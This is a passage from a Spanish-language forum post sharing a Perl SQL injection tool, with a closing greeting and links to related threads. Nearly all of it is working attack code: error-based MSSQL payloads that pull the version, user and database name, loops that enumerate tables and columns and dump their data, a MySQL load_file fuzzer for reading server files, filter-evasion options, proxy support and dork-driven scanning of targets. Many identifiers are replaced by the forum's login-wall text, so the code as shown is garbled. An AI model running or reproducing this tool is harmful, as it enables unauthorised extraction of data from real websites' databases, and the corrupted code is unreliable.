  554. $ua->proxy("http", "http://$proxy/") if No tienes permisos para ver links. Registrate o Entra con tu cuenta($proxy);
  555. my $request = $ua->get($newstring);
  556. my $content = $request->content;
  557. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Trying To Fuzz Load_File with $word_list_search[$i]";
  558. if ($content =~ m/az88pix00q/i)
  559. {
  560. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[!] Found File ! $word_list_search[$i] \n";
  561. No tienes permisos para ver links. Registrate o Entra con tu cuenta(@cols_possible,"$word_list_search[$i]\n");
  562. }
  563. $i++;
  564. }
  565. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($vulnfile))
  566. {
  567. No tienes permisos para ver links. Registrate o Entra con tu cuenta(vuln_file,">>$vulnfile") ;
  568. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Target : $site\n";
  569. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] evasion : $ev\n";
  570. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Wordlist : $filelst\n";
  571. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Files Found :: ---- \n\n\n";
  572. $i=0;
  573. foreach(@cols_possible)
  574. {
  575. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file $cols_possible[$i]."\n";
  576. $i++;
  577. }
  578. No tienes permisos para ver links. Registrate o Entra con tu cuenta(vuln_file);
  579. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Result Saved to $vulnfile\n";
  580. }
  581. }
  582. else
  583. {
  584. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
  585. No tienes permisos para ver links. Registrate o Entra con tu cuenta () ;
  586. }
  587. }
  588.  
  589. sub mssqldetails
  590. {
  591. my $site = $_[0];
  592. my $ev = $_[1];
  593. if ($ev eq '/*')
  594. {$add = "/**/" ; $com = "/*";}
  595. elsif ($ev eq '%20')
  596. {$add = "%20" ; $com = "%00" ;}
  597. else
  598. {$add = '+' ; $com ='--';}
  599. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Getting Infos, Started Please Wait ....\n\n";
  600. $version = "convert(int,(select".$add."\@\@version));--" ;
  601. $system_user = 'convert(int,(select'.$add.'system_user));--';
  602. $db_name = 'convert(int,(select'.$add.'db_name()));--';
  603. $servername = 'convert(int,(select'.$add.'@@servername));--' ;
  604. my $injection = $site.$version ;
  605. my $request = HTTP::Request->new(GET=>$injection);
  606. my $useragent = LWP::UserAgent->new();
  607. $useragent->timeout(10);
  608. my $response = $useragent->request($request)->as_string ;
  609. if ($response =~ /.*?values'/)
  610. {
  611. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] This Website Is SQL Vulnerable ..\n";
  612. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Working On It ..\n";
  613. $ver = $1 if ($response =~ /.*?value\s'(.*?)'\sto.*/sm) ;
  614. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[!] MsSQL Version Is :";
  615. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n => $ver" ;
  616. my $injection = $site.$system_user ;
  617. my $request = HTTP::Request->new(GET=>$injection);
  618. my $useragent = LWP::UserAgent->new();
  619. $useragent->timeout(10);
  620. my $response = $useragent->request($request)->as_string ;
  621. $system_user = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
  622. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[!] MsSQL System_User Is :";
  623. No tienes permisos para ver links. Registrate o Entra con tu cuenta " $system_user " ;
  624. my $injection = $site.$db_name ;
  625. my $request = HTTP::Request->new(GET=>$injection);
  626. my $useragent = LWP::UserAgent->new();
  627. $useragent->timeout(10);
  628. my $response = $useragent->request($request)->as_string ;
  629. $db_name = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
  630. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[!] MsSQL Database Name Is :";
  631. No tienes permisos para ver links. Registrate o Entra con tu cuenta " $db_name " ;
  632. my $injection = $site.$servername ;
  633. my $request = HTTP::Request->new(GET=>$injection);
  634. my $useragent = LWP::UserAgent->new();
  635. $useragent->timeout(10);
  636. my $response = $useragent->request($request)->as_string ;
  637. $servername = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
  638. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[!] MsSQL Server Name Is :";
  639. No tienes permisos para ver links. Registrate o Entra con tu cuenta " $servername " ;
  640. No tienes permisos para ver links. Registrate o Entra con tu cuenta ();
  641. }
  642. else
  643. {
  644. No tienes permisos para ver links. Registrate o Entra con tu cuenta ("cls");
  645. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[!] This Website Is Not SQL Vulnerable !";
  646. No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  647. }
  648. }
  649.  
  650. sub mssqltable
  651. {
  652. my $site = $_[0];
  653. my $ev = $_[1];
  654. if ($ev eq '/*')
  655. {$add = "/**/" ; $com = "/*";}
  656. elsif ($ev eq '%20')
  657. {$add = "%20" ; $com = "%00" ;}
  658. else
  659. {$add = '+' ; $com ='--';}
  660. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Table Extracting, Started Please Wait ....\n\n";
  661. $table = "convert(int,(select".$add."top".$add."1".$add."table_name".$add."from".$add."information_schema.tables));--";
  662. $data = "'Ws65qd798sqd9878'";
  663. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Tables : //// \n\n";
  664. for ($i;$i<1500;$i++)
  665. {
  666. my $injection = $site.$table ;
  667. my $useragent = LWP::UserAgent->new();
  668. $ua->proxy("http", "http://$proxy/") if No tienes permisos para ver links. Registrate o Entra con tu cuenta($proxy);
  669. my $request = $useragent->get($injection);
  670. my $response = $request->content;
  671. if ($response =~ /.*?value\s'(.*?)'\sto.*/sm)
  672. {
  673. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] ".$1."\n";
  674. No tienes permisos para ver links. Registrate o Entra con tu cuenta (@exttbles,$1);
  675. $start = "(";
  676. $data .= ",'$1'";
  677. $end = ")";
  678. $total = $start.$data.$end;
  679. $table = "convert(int,(select".$add."top".$add."1".$add."table_name".$add."from".$add."information_schema.tables".$add."where".$add."table_name".$add."not".$add."in".$add."$total));--";
  680. }
  681. }
  682. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($vulnfile))
  683. {
  684. No tienes permisos para ver links. Registrate o Entra con tu cuenta(vuln_file,">>$vulnfile") ;
  685. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Target : $site\n";
  686. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] evasion : $ev\n";
  687. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Data :: ---- \n\n\n";
  688. $i=0;
  689. foreach(@exttbles)
  690. {
  691. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file $exttbles[$i]."\n";
  692. $i++;
  693. }
  694. No tienes permisos para ver links. Registrate o Entra con tu cuenta(vuln_file);
  695. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Result Saved to $vulnfile\n";
  696. }
  697. }
  698.  
  699. sub mssqlcolumn
  700. {
  701. my $site = $_[0];
  702. my $ev = $_[1];
  703. my $tblextrct = $_[2];
  704. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Table To Extract From $tblextrct\n";
  705. if ($ev eq '/*')
  706. {$add = "/**/" ; $com = "/*";}
  707. elsif ($ev eq '%20')
  708. {$add = "%20" ; $com = "%00" ;}
  709. else
  710. {$add = '+' ; $com ='--';}
  711. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Table Extracting, Started Please Wait ....\n\n";
  712. $data = "'Ws65qd798sqd9878'";
  713. $table = "convert(int,(select".$add."top".$add."1".$add."column_name".$add."from".$add."information_schema.columns".$add."where".$add."table_name"."="."'$tblextrct'".$add."And".$add."column_name".$add."not".$add."in".$add."($data)"."));--";
  714. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Columns : //// \n\n";
  715. for ($i;$i<1500;$i++)
  716. {
  717. my $injection = $site.$table ;
  718. my $useragent = LWP::UserAgent->new();
  719. $ua->proxy("http", "http://$proxy/") if No tienes permisos para ver links. Registrate o Entra con tu cuenta($proxy);
  720. my $request = $useragent->get($injection);
  721. my $response = $request->content;
  722. if ($response =~ /.*?values'(.*?)'sto.*/sm)
  723. {
  724. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] ".$1."\n";
  725. No tienes permisos para ver links. Registrate o Entra con tu cuenta (@extcols,$1);
  726. $start = "(";
  727. $data .= ",'$1'";
  728. $end = ")";
  729. $total = $start.$data.$end;
  730. $table = "convert(int,(select".$add."top".$add."1".$add."column_name".$add."from".$add."information_schema.columns".$add."where".$add."table_name"."="."'$tblextrct'".$add."And".$add."column_name".$add."not".$add."in".$add."$total"."));--";
  731. }
  732. }
  733. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($vulnfile))
  734. {
  735. No tienes permisos para ver links. Registrate o Entra con tu cuenta(vuln_file,">>$vulnfile") ;
  736. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Target : $site\n";
  737. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] evasion : $ev\n";
  738. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Data :: ---- \n\n\n";
  739. $i=0;
  740. foreach(@extcols)
  741. {
  742. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file $extcols[$i]."\n";
  743. $i++;
  744. }
  745. No tienes permisos para ver links. Registrate o Entra con tu cuenta(vuln_file);
  746. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Result Saved to $vulnfile\n";
  747. }
  748. }
  749.  
  750. sub mssqldump
  751. {
  752. my $site = $_[0];
  753. my $ev = $_[1];
  754. my $tblextrct = $_[2];
  755. my $colmextrct = $_[3];
  756. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Table : $tblextrct\n";
  757. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Column : $colmextrct\n";
  758. if ($ev eq '/*')
  759. {$add = "/**/" ; $com = "/*";}
  760. elsif ($ev eq '%20')
  761. {$add = "%20" ; $com = "%00" ;}
  762. else
  763. {$add = '+' ; $com ='--';}
  764. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Table Extracting, Started Please Wait ....\n\n";
  765. $data = "'Ws65qd798sqd9878'";
  766. $table = "convert(int,(select".$add."top".$add."1".$add."$colmextrct".$add."from".$add."$tblextrct".$add."where".$add."$colmextrct".$add."not".$add."in".$add."($data)"."));--";
  767. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Columns : //// \n\n";
  768. for ($i;$i<1500;$i++)
  769. {
  770. my $injection = $site.$table ;
  771. my $useragent = LWP::UserAgent->new();
  772. $ua->proxy("http", "http://$proxy/") if No tienes permisos para ver links. Registrate o Entra con tu cuenta($proxy);
  773. my $request = $useragent->get($injection);
  774. my $response = $request->content;
  775. if ($response =~ /.*?values'(.*?)'sto.*/sm)
  776. {
  777. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] ".$1."\n";
  778. No tienes permisos para ver links. Registrate o Entra con tu cuenta (@dumpdata,$1);
  779. $start = "(";
  780. $data .= ",'$1'";
  781. $end = ")";
  782. $total = $start.$data.$end;
  783. $table = "convert(int,(select".$add."top".$add."1".$add."$colmextrct".$add."from".$add."$tblextrct".$add."where".$add."$colmextrct".$add."not".$add."in".$add."$total"."));--";
  784. }
  785. }
  786. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($vulnfile))
  787. {
  788. No tienes permisos para ver links. Registrate o Entra con tu cuenta(vuln_file,">>$vulnfile") ;
  789. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Target : $site\n";
  790. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] evasion : $ev\n";
  791. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Data :: ---- \n\n\n";
  792. $i=0;
  793. foreach(@dumpdata)
  794. {
  795. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file $dumpdata[$i]."\n";
  796. $i++;
  797. }
  798. No tienes permisos para ver links. Registrate o Entra con tu cuenta(vuln_file);
  799. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Result Saved to $vulnfile\n";
  800. }
  801. }
  802.  
  803. variables();
  804. main();
  805.  
  806. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($search_dork))
  807. {
  808. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Vulnerability Scan\n" ;
  809. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Dork : $search_dork\n\n\n" ;
  810. vulnscanner();
  811. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($vulnfile))
  812. {
  813. No tienes permisos para ver links. Registrate o Entra con tu cuenta(vuln_file,">>$vulnfile") ;
  814. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file @mysqlvuln;
  815. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file @mssqlvuln;
  816. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file @accessvuln;
  817. No tienes permisos para ver links. Registrate o Entra con tu cuenta(vuln_file);
  818. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Result Saved to $vulnfile\n";
  819. No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  820. }
  821. }
  822.  
  823. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($mysql_count_target))
  824. {
  825. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] MySQL Column Counter\n\n" ;
  826. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Target : $mysql_count_target\n" ;
  827. if ($evasion eq '/*')
  828. {
  829. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : /**/\n" ;
  830. }
  831. elsif ($evasion eq '%20')
  832. {
  833. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : %20\n" ;
  834. }
  835. else
  836. {
  837. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : --\n" ;
  838. $evasion = "--"
  839. }
  840. mysqlcount($mysql_count_target,$evasion);
  841. }
  842.  
  843. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($mysql_details_target))
  844. {
  845. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] MySQL database details\n\n" ;
  846. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Target : $mysql_details_target\n" ;
  847. if ($evasion eq '/*')
  848. {
  849. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : /**/\n" ;
  850. }
  851. elsif ($evasion eq '%20')
  852. {
  853. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : %20\n" ;
  854. }
  855. else
  856. {
  857. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : --\n" ;
  858. $evasion = "--"
  859. }
  860. mysqldetails($mysql_details_target,$evasion);
  861. }
  862.  
  863. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($mysql_schema_target))
  864. {
  865. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] MySQL Schema Extractor details\n\n" ;
  866. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Target : $mysql_schema_target\n" ;
  867. if ($evasion eq '/*')
  868. {
  869. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : /**/\n" ;
  870. }
  871. elsif ($evasion eq '%20')
  872. {
  873. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : %20\n" ;
  874. }
  875. else
  876. {
  877. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : --\n" ;
  878. $evasion = "--"
  879. }
  880. mysqlschema($mysql_schema_target,$evasion);
  881. }
  882.  
  883. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($mysql_dump_target))
  884. {
  885. if (!No tienes permisos para ver links. Registrate o Entra con tu cuenta($sql_dump_column))
  886. {
  887. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Please Defind At Least A Column\n";
  888. No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  889. }
  890. elsif (!No tienes permisos para ver links. Registrate o Entra con tu cuenta($sql_dump_table))
  891. {
  892. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Please Defind Table Name\n";
  893. No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  894. }
  895. else
  896. {
  897. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] MySQL Data Dumper details\n\n" ;
  898. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Target : $mysql_dump_target\n" ;
  899. if ($evasion eq '/*')
  900. {
  901. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : /**/\n" ;
  902. }
  903. elsif ($evasion eq '%20')
  904. {
  905. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : %20\n" ;
  906. }
  907. else
  908. {
  909. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : --\n" ;
  910. $evasion = "--"
  911. }
  912. mysqldump($mysql_dump_target,$sql_dump_column,$sql_dump_table,$evasion);
  913. }
  914. }
  915.  
  916. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($mysql_fuzz_table))
  917. {
  918. if(!No tienes permisos para ver links. Registrate o Entra con tu cuenta($word_list))
  919. {
  920. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Please Define A list of tables to load\n";
  921. No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  922. }
  923. else
  924. {
  925. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] MySQL Tables Fuzzer\n\n" ;
  926. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Target : $mysql_fuzz_table\n" ;
  927. if ($evasion eq '/*')
  928. {
  929. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : /**/\n" ;
  930. }
  931. elsif ($evasion eq '%20')
  932. {
  933. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : %20\n" ;
  934. }
  935. else
  936. {
  937. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : --\n" ;
  938. $evasion = "--"
  939. }
  940. mysqlfuzztable($mysql_fuzz_table,$evasion,$word_list);
  941. }
  942. }
  943.  
  944. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($mysql_fuzz_column))
  945. {
  946. if(!No tienes permisos para ver links. Registrate o Entra con tu cuenta($word_list))
  947. {
  948. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Please Define A list of tables to load\n";
  949. No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  950. }
  951. elsif(!No tienes permisos para ver links. Registrate o Entra con tu cuenta($sql_dump_table))
  952. {
  953. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Please Define A Table To Fuzz it's Columns\n";
  954. No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  955. }
  956. else
  957. {
  958. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] MySQL Columns Fuzzer\n\n" ;
  959. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Target : $mysql_fuzz_column\n" ;
  960. if ($evasion eq '/*')
  961. {
  962. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : /**/\n" ;
  963. }
  964. elsif ($evasion eq '%20')
  965. {
  966. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : %20\n" ;
  967. }
  968. else
  969. {
  970. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : --\n" ;
  971. $evasion = "--"
  972. }
  973. mysqlfuzzcolumn($mysql_fuzz_column,$evasion,$word_list,$sql_dump_table);
  974. }
  975. }
  976.  
  977. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($mysql_load_file))
  978. {
  979. if(!No tienes permisos para ver links. Registrate o Entra con tu cuenta($word_list))
  980. {
  981. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Please Define A list of tables to load\n";
  982. No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  983. }
  984. else
  985. {
  986. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] MySQL Load_File Fuzzer\n\n" ;
  987. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Target : $mysql_load_file\n" ;
  988. if ($evasion eq '/*')
  989. {
  990. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : /**/\n" ;
  991. }
  992. elsif ($evasion eq '%20')
  993. {
  994. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : %20\n" ;
  995. }
  996. else
  997. {
  998. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : --\n" ;
  999. $evasion = "--"
  1000. }
  1001. mysqlfile($mysql_load_file,$evasion,$word_list);
  1002. }
  1003. }
  1004.  
  1005. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($mssql_details_target))
  1006. {
  1007. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] MsSQL DB Details\n\n" ;
  1008. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Target : $mssql_details_target\n" ;
  1009. if ($evasion eq '/*')
  1010. {
  1011. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : /**/\n" ;
  1012. }
  1013. elsif ($evasion eq '%20')
  1014. {
  1015. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : %20\n" ;
  1016. }
  1017. else
  1018. {
  1019. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : --\n" ;
  1020. $evasion = "--"
  1021. }
  1022. mssqldetails($mssql_details_target,$evasion);
  1023. }
  1024.  
  1025. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($mssql_table_target))
  1026. {
  1027. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] MsSQL Tables Extractor\n\n" ;
  1028. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Target : $mssql_table_target\n" ;
  1029. if ($evasion eq '/*')
  1030. {
  1031. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : /**/\n" ;
  1032. }
  1033. elsif ($evasion eq '%20')
  1034. {
  1035. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : %20\n" ;
  1036. }
  1037. else
  1038. {
  1039. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : --\n" ;
  1040. $evasion = "--"
  1041. }
  1042. mssqltable($mssql_table_target,$evasion);
  1043. }
  1044.  
  1045. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($mssql_column_target))
  1046. {
  1047. if(!No tienes permisos para ver links. Registrate o Entra con tu cuenta($sql_dump_table))
  1048. {
  1049. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Please Defind At Least A Table do Extract from\n";
  1050. No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  1051. }
  1052. else
  1053. {
  1054. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] MsSQL Columns Extractor\n\n" ;
  1055. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Target : $mssql_column_target\n" ;
  1056. if ($evasion eq '/*')
  1057. {
  1058. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : /**/\n" ;
  1059. }
  1060. elsif ($evasion eq '%20')
  1061. {
  1062. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : %20\n" ;
  1063. }
  1064. else
  1065. {
  1066. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : --\n" ;
  1067. $evasion = "--"
  1068. }
  1069. mssqlcolumn($mssql_column_target,$evasion,$sql_dump_table);
  1070. }
  1071. }
  1072.  
  1073. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($mssql_dump_target))
  1074. {
  1075. if(!No tienes permisos para ver links. Registrate o Entra con tu cuenta($sql_dump_table))
  1076. {
  1077. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Please Defind At Least A Table\n";
  1078. No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  1079. }
  1080. elsif(!No tienes permisos para ver links. Registrate o Entra con tu cuenta($sql_dump_column))
  1081. {
  1082. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Please Defind At Least A Column\n";
  1083. No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  1084. }
  1085. else
  1086. {
  1087. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] MsSQL Data Dumper\n\n" ;
  1088. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Target : $mssql_dump_target\n" ;
  1089. if ($evasion eq '/*')
  1090. {
  1091. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : /**/\n" ;
  1092. }
  1093. elsif ($evasion eq '%20')
  1094. {
  1095. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : %20\n" ;
  1096. }
  1097. else
  1098. {
  1099. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Evasion : --\n" ;
  1100. $evasion = "--"
  1101. }
  1102. mssqldump($mssql_dump_target,$evasion,$sql_dump_table,$sql_dump_column);
  1103. }
  1104. }  
  1105.  

Espero que os sirva!:O

Saludos
« Última modificación: Marzo 14, 2015, 09:50:52 am por Expermicid »
Me cambie de messenger ahora es: edeex@live.comNo tienes permisos para ver links. Registrate o Entra con tu cuenta

 

¿Te gustó el post? COMPARTILO!



Sqli Dorking

Iniciado por ZanGetsu

Respuestas: 1
Vistas: 1768
Último mensaje Agosto 31, 2013, 03:29:16 am
por hdbreaker
Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 3243
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 1518
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
[Perl] Half Life Servers List 0.1

Iniciado por BigBear

Respuestas: 0
Vistas: 1142
Último mensaje Noviembre 12, 2012, 07:31:50 pm
por BigBear
[Uniscan] Scanner de vulnerabilidades WEB hecho en Perl

Iniciado por tar3kw0rm3d

Respuestas: 0
Vistas: 1668
Último mensaje Junio 02, 2013, 08:01:28 pm
por tar3kw0rm3d